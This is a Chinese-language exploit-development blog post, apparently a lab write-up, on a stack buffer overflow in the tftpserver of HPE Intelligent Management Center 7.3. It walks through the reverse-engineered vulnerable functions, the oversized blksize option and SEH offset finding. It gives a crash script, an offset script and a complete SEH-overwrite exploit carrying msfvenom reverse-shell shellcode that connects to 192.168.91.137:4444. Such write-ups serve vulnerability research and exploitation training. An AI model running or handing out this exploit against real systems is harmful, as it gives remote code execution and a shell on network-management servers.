<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"n0maj1o24.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="本次实验讨论在Win10 21h2 x86系统下关闭全局DEP。后续再看开启全局DEP的情况。软件版本为：iMC_PLAT_7.3_E0506_Std_Win。 因为是UDP包，断点需要下在函数ws2_32!recvfrom上面：  尝试发送一个包，然后用命令k查看调用栈，注意标红的位置，后续可以在该位置下断点，删除之前在recvfrom下的断点。 IDA中sub_40A400函数用于处理tftp">
<meta property="og:type" content="article">
<meta property="og:title" content="HPE Intelligent Management Center: Stack Buffer Overflow In tftpserver">
<meta property="og:url" content="https://n0maj1o24.github.io/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/index.html">
<meta property="og:site_name" content="Technical Memorandum">
<meta property="og:description" content="本次实验讨论在Win10 21h2 x86系统下关闭全局DEP。后续再看开启全局DEP的情况。软件版本为：iMC_PLAT_7.3_E0506_Std_Win。 因为是UDP包，断点需要下在函数ws2_32!recvfrom上面：  尝试发送一个包，然后用命令k查看调用栈，注意标红的位置，后续可以在该位置下断点，删除之前在recvfrom下的断点。 IDA中sub_40A400函数用于处理tftp">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/07.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/06.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/08.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/09.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/02.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/03.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/05.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/04.png">
<meta property="og:image" content="https://n0maj1o24.github.io/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/01.png">
<meta property="article:published_time" content="2022-05-14T21:54:10.000Z">
<meta property="article:modified_time" content="2022-05-28T08:28:06.042Z">
<meta property="article:author" content="n0maj1o24">
<meta property="article:tag" content="Windows">
<meta property="article:tag" content="Stack Based Overflows">
<meta property="article:tag" content="DEP">
<meta property="article:tag" content="ROP">
<meta property="article:tag" content="SEH">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://n0maj1o24.github.io/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/07.png">

<link rel="canonical" href="https://n0maj1o24.github.io/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>HPE Intelligent Management Center: Stack Buffer Overflow In tftpserver | Technical Memorandum</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Technical Memorandum</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://n0maj1o24.github.io/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpeg">
      <meta itemprop="name" content="n0maj1o24">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Technical Memorandum">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          HPE Intelligent Management Center: Stack Buffer Overflow In tftpserver
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-05-14 21:54:10" itemprop="dateCreated datePublished" datetime="2022-05-14T21:54:10Z">2022-05-14</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-05-28 08:28:06" itemprop="dateModified" datetime="2022-05-28T08:28:06Z">2022-05-28</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Windows-Exploitation/" itemprop="url" rel="index"><span itemprop="name">Windows Exploitation</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>本次实验讨论在<code>Win10 21h2 x86</code>系统下关闭全局<code>DEP</code>。后续再看开启全局<code>DEP</code>的情况。软件版本为：<a href="https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=22211&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=" target="_blank" rel="noopener">iMC_PLAT_7.3_E0506_Std_Win</a>。</p>
<p>因为是<code>UDP</code>包，断点需要下在函数<code>ws2_32!recvfrom</code>上面：</p>
<p><img src="/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/07.png" alt="BOF"></p>
<p>尝试发送一个包，然后用命令<code>k</code>查看调用栈，注意标红的位置，后续可以在该位置下断点，删除之前在<code>recvfrom</code>下的断点。</p>
<p><code>IDA</code>中<code>sub_40A400</code>函数用于处理<code>tftpserver</code>的命令，注意看如下用于从服务器读取文件，这里申请了一个<code>9999bytes</code>大小的空间：</p>
<p><img src="/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/06.png" alt="BOF"></p>
<p>跟进：</p>
<p><img src="/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/08.png" alt="BOF"></p>
<p>继续跟进函数<code>sub_407730</code>:</p>
<p><img src="/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/09.png" alt="BOF"></p>
<p>注意看，读取文件内容到之前申请的<code>9999bytes</code>空间里面去，而count又是用户可以控制的，那么，如果读取内容大于<code>9999bytes</code>，就会造成栈溢出。</p>
<p>因为涉及的是<code>tftpserver</code>的漏洞利用，需要对<code>tftpserver</code>相关协议有一个了解，这里重点关注<a href="https://datatracker.ietf.org/doc/html/rfc2347" target="_blank" rel="noopener">RFC2347</a>即可。结合前面逆向的分析，这里漏洞点在<code>blksize</code>是我们可以控制的（但是这个值最大为<code>65535</code>），最后会带入上面的<code>count</code>参数，结合<code>tftpserver</code>读文件的时候，导致栈溢出。</p>
<p>看一下能造成<code>crash</code>的脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="keyword">import</span> tftpy</span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line">total_size = <span class="number">40960</span></span><br><span class="line">junk = <span class="string">b'\x41'</span>*total_size</span><br><span class="line"><span class="keyword">with</span> open(<span class="string">"crash.txt"</span>,<span class="string">"wb"</span>) <span class="keyword">as</span> filehander:</span><br><span class="line">    filehander.write(junk) </span><br><span class="line">client = tftpy.TftpClient(<span class="string">'127.0.0.1'</span>, <span class="number">69</span>)</span><br><span class="line">client.upload(<span class="string">'crash.txt'</span>, <span class="string">'crash.txt'</span>)</span><br><span class="line"></span><br><span class="line">client = tftpy.TftpClient(<span class="string">'127.0.0.1'</span>, <span class="number">69</span>, options=&#123;<span class="string">'blksize'</span>:<span class="number">10240</span>&#125;)</span><br><span class="line">client.download(<span class="string">'crash.txt'</span>,<span class="string">'download.txt'</span>)</span><br></pre></td></tr></table></figure>

<p>先来看一下溢出的情况，是一个<code>SEH</code>的栈溢出：</p>
<p><img src="/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/02.png" alt="BOF"></p>
<p>获取<code>SEH</code>覆盖的<code>Offset</code>：</p>
<p><img src="/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/03.png" alt="BOF"></p>
<p><img src="/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/05.png" alt="BOF"></p>
<p>验证<code>Offset</code>的脚本如下：(<code>10004</code>是最终符合条件的偏移)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="keyword">import</span> tftpy</span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line">total_size = <span class="number">40960</span></span><br><span class="line">junk1 = <span class="string">b'A'</span>*<span class="number">10004</span></span><br><span class="line">nseh = <span class="string">b'B'</span>*<span class="number">4</span></span><br><span class="line">seh = <span class="string">b'C'</span>*<span class="number">4</span></span><br><span class="line">junk2 = <span class="string">b'D'</span>*(total_size<span class="number">-10004</span><span class="number">-4</span><span class="number">-4</span>)</span><br><span class="line"><span class="keyword">with</span> open(<span class="string">"offset.txt"</span>,<span class="string">"wb"</span>) <span class="keyword">as</span> filehander:</span><br><span class="line">	filehander.write(junk1+nseh+seh+junk2) </span><br><span class="line">client = tftpy.TftpClient(<span class="string">'127.0.0.1'</span>, <span class="number">69</span>)</span><br><span class="line">client.upload(<span class="string">'offset.txt'</span>, <span class="string">'offset.txt'</span>)</span><br><span class="line"></span><br><span class="line">client = tftpy.TftpClient(<span class="string">'127.0.0.1'</span>, <span class="number">69</span>, options=&#123;<span class="string">'blksize'</span>:<span class="number">40960</span>&#125;)</span><br><span class="line">client.download(<span class="string">'offset.txt'</span>,<span class="string">'download.txt'</span>)</span><br></pre></td></tr></table></figure>

<p><img src="/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/04.png" alt="BOF"></p>
<p>发现仅能覆盖<code>Next SEH</code>，这就是问题所在，导致没法利用，<strong>坑点</strong>。</p>
<p>为了保证我们能够完全覆盖<code>Next SEH</code>和<code>SEH Handler</code>，需要让<code>blksize</code>的值为某个确定值，多次尝试之后最终确定其大小为<code>61400</code>，<strong>最大的坑点</strong>。</p>
<p>坏字符仅为<code>\x00</code>，这就不过多说了。</p>
<p><code>tftp</code>协议相关的部分，我使用了<a href="https://github.com/msoulier/tftpy" target="_blank" rel="noopener">tftpy</a>这个库，可以节省不少时间。</p>
<p>最终的利用代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="keyword">import</span> tftpy</span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">total_size = <span class="number">0x20000</span></span><br><span class="line"><span class="comment">#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.91.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode -b '\x00'</span></span><br><span class="line">shellcode =  <span class="string">b""</span></span><br><span class="line">shellcode += <span class="string">b"\xbb\x4f\x66\xd7\x53\xda\xc9\xd9\x74\x24\xf4"</span></span><br><span class="line">shellcode += <span class="string">b"\x5a\x2b\xc9\xb1\x52\x31\x5a\x12\x03\x5a\x12"</span></span><br><span class="line">shellcode += <span class="string">b"\x83\x8d\x62\x35\xa6\xed\x83\x3b\x49\x0d\x54"</span></span><br><span class="line">shellcode += <span class="string">b"\x5c\xc3\xe8\x65\x5c\xb7\x79\xd5\x6c\xb3\x2f"</span></span><br><span class="line">shellcode += <span class="string">b"\xda\x07\x91\xdb\x69\x65\x3e\xec\xda\xc0\x18"</span></span><br><span class="line">shellcode += <span class="string">b"\xc3\xdb\x79\x58\x42\x58\x80\x8d\xa4\x61\x4b"</span></span><br><span class="line">shellcode += <span class="string">b"\xc0\xa5\xa6\xb6\x29\xf7\x7f\xbc\x9c\xe7\xf4"</span></span><br><span class="line">shellcode += <span class="string">b"\x88\x1c\x8c\x47\x1c\x25\x71\x1f\x1f\x04\x24"</span></span><br><span class="line">shellcode += <span class="string">b"\x2b\x46\x86\xc7\xf8\xf2\x8f\xdf\x1d\x3e\x59"</span></span><br><span class="line">shellcode += <span class="string">b"\x54\xd5\xb4\x58\xbc\x27\x34\xf6\x81\x87\xc7"</span></span><br><span class="line">shellcode += <span class="string">b"\x06\xc6\x20\x38\x7d\x3e\x53\xc5\x86\x85\x29"</span></span><br><span class="line">shellcode += <span class="string">b"\x11\x02\x1d\x89\xd2\xb4\xf9\x2b\x36\x22\x8a"</span></span><br><span class="line">shellcode += <span class="string">b"\x20\xf3\x20\xd4\x24\x02\xe4\x6f\x50\x8f\x0b"</span></span><br><span class="line">shellcode += <span class="string">b"\xbf\xd0\xcb\x2f\x1b\xb8\x88\x4e\x3a\x64\x7e"</span></span><br><span class="line">shellcode += <span class="string">b"\x6e\x5c\xc7\xdf\xca\x17\xea\x34\x67\x7a\x63"</span></span><br><span class="line">shellcode += <span class="string">b"\xf8\x4a\x84\x73\x96\xdd\xf7\x41\x39\x76\x9f"</span></span><br><span class="line">shellcode += <span class="string">b"\xe9\xb2\x50\x58\x0d\xe9\x25\xf6\xf0\x12\x56"</span></span><br><span class="line">shellcode += <span class="string">b"\xdf\x36\x46\x06\x77\x9e\xe7\xcd\x87\x1f\x32"</span></span><br><span class="line">shellcode += <span class="string">b"\x41\xd7\x8f\xed\x22\x87\x6f\x5e\xcb\xcd\x7f"</span></span><br><span class="line">shellcode += <span class="string">b"\x81\xeb\xee\x55\xaa\x86\x15\x3e\x15\xfe\x4e"</span></span><br><span class="line">shellcode += <span class="string">b"\x37\xfd\xfd\x70\x56\xa2\x88\x96\x32\x4a\xdd"</span></span><br><span class="line">shellcode += <span class="string">b"\x01\xab\xf3\x44\xd9\x4a\xfb\x52\xa4\x4d\x77"</span></span><br><span class="line">shellcode += <span class="string">b"\x51\x59\x03\x70\x1c\x49\xf4\x70\x6b\x33\x53"</span></span><br><span class="line">shellcode += <span class="string">b"\x8e\x41\x5b\x3f\x1d\x0e\x9b\x36\x3e\x99\xcc"</span></span><br><span class="line">shellcode += <span class="string">b"\x1f\xf0\xd0\x98\x8d\xab\x4a\xbe\x4f\x2d\xb4"</span></span><br><span class="line">shellcode += <span class="string">b"\x7a\x94\x8e\x3b\x83\x59\xaa\x1f\x93\xa7\x33"</span></span><br><span class="line">shellcode += <span class="string">b"\x24\xc7\x77\x62\xf2\xb1\x31\xdc\xb4\x6b\xe8"</span></span><br><span class="line">shellcode += <span class="string">b"\xb3\x1e\xfb\x6d\xf8\xa0\x7d\x72\xd5\x56\x61"</span></span><br><span class="line">shellcode += <span class="string">b"\xc3\x80\x2e\x9e\xec\x44\xa7\xe7\x10\xf5\x48"</span></span><br><span class="line">shellcode += <span class="string">b"\x32\x91\x15\xab\x96\xec\xbd\x72\x73\x4d\xa0"</span></span><br><span class="line">shellcode += <span class="string">b"\x84\xae\x92\xdd\x06\x5a\x6b\x1a\x16\x2f\x6e"</span></span><br><span class="line">shellcode += <span class="string">b"\x66\x90\xdc\x02\xf7\x75\xe2\xb1\xf8\x5f"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    </span><br><span class="line">junk1 = <span class="string">b'\x41'</span>*<span class="number">10004</span></span><br><span class="line">nseh = <span class="string">b"\xEB\x06\x90\x90"</span></span><br><span class="line">seh = struct.pack(<span class="string">"&lt;L"</span>,<span class="number">0x1206d7ce</span>)    <span class="comment">#0x1206d7ce : pop ebp # pop edi # ret  |</span></span><br><span class="line">nops1 = <span class="string">b'\x90'</span>*<span class="number">64</span></span><br><span class="line">junk2 = <span class="string">b'B'</span>*(total_size<span class="number">-10004</span><span class="number">-4</span><span class="number">-4</span><span class="number">-64</span>-len(shellcode))</span><br><span class="line">buffer = junk1+nseh+seh+nops1+shellcode+junk2</span><br><span class="line"><span class="keyword">with</span> open(<span class="string">"exploit.txt"</span>,<span class="string">"wb"</span>) <span class="keyword">as</span> filehander:</span><br><span class="line">    filehander.write(buffer) </span><br><span class="line">client = tftpy.TftpClient(<span class="string">'127.0.0.1'</span>, <span class="number">69</span>)</span><br><span class="line">client.upload(<span class="string">'exploit.txt'</span>, <span class="string">'exploit.txt'</span>)</span><br><span class="line"></span><br><span class="line">client = tftpy.TftpClient(<span class="string">'127.0.0.1'</span>, <span class="number">69</span>, options=&#123;<span class="string">'blksize'</span>:<span class="number">61400</span>&#125;)</span><br><span class="line">client.download(<span class="string">'exploit.txt'</span>,<span class="string">'download.txt'</span>)</span><br></pre></td></tr></table></figure>

<p>喜闻乐见的反弹<code>shell</code>：</p>
<p><img src="/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/01.png" alt="BOF"></p>
<p>参考：</p>
<p>1.<a href="https://blog.exodusintel.com/2018/10/16/hpe-imc-a-case-study-on-the-reliability-of-security-fixes/" target="_blank" rel="noopener">https://blog.exodusintel.com/2018/10/16/hpe-imc-a-case-study-on-the-reliability-of-security-fixes/</a></p>
<p>2.<a href="https://www.tenable.com/plugins/nessus/102500" target="_blank" rel="noopener">https://www.tenable.com/plugins/nessus/102500</a></p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>n0maj1o24
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://n0maj1o24.github.io/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/" title="HPE Intelligent Management Center: Stack Buffer Overflow In tftpserver">https://n0maj1o24.github.io/2022/05/15/HPE-Intelligent-Management-Center-Stack-Buffer-Overflow-In-tftpserver/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/deed.zh" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-ND</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Windows/" rel="tag"># Windows</a>
              <a href="/tags/Stack-Based-Overflows/" rel="tag"># Stack Based Overflows</a>
              <a href="/tags/DEP/" rel="tag"># DEP</a>
              <a href="/tags/ROP/" rel="tag"># ROP</a>
              <a href="/tags/SEH/" rel="tag"># SEH</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/" rel="prev" title="Audio Converter 8.1 - SEH Stack Buffer Overflow:DEP and ASLR bypass">
      <i class="fa fa-chevron-left"></i> Audio Converter 8.1 - SEH Stack Buffer Overflow:DEP and ASLR bypass
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/05/28/Advantech-WebAccess-8-x-8-1-Multiple-Vulnerabilities/" rel="next" title="Advantech WebAccess 8.x<8.1 Multiple Vulnerabilities">
      Advantech WebAccess 8.x<8.1 Multiple Vulnerabilities <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="n0maj1o24"
      src="/images/avatar.jpeg">
  <p class="site-author-name" itemprop="name">n0maj1o24</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">45</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">38</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/n0maj1o24" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;n0maj1o24" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/deed.zh" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-nd.svg" alt="Creative Commons"></a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">n0maj1o24</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
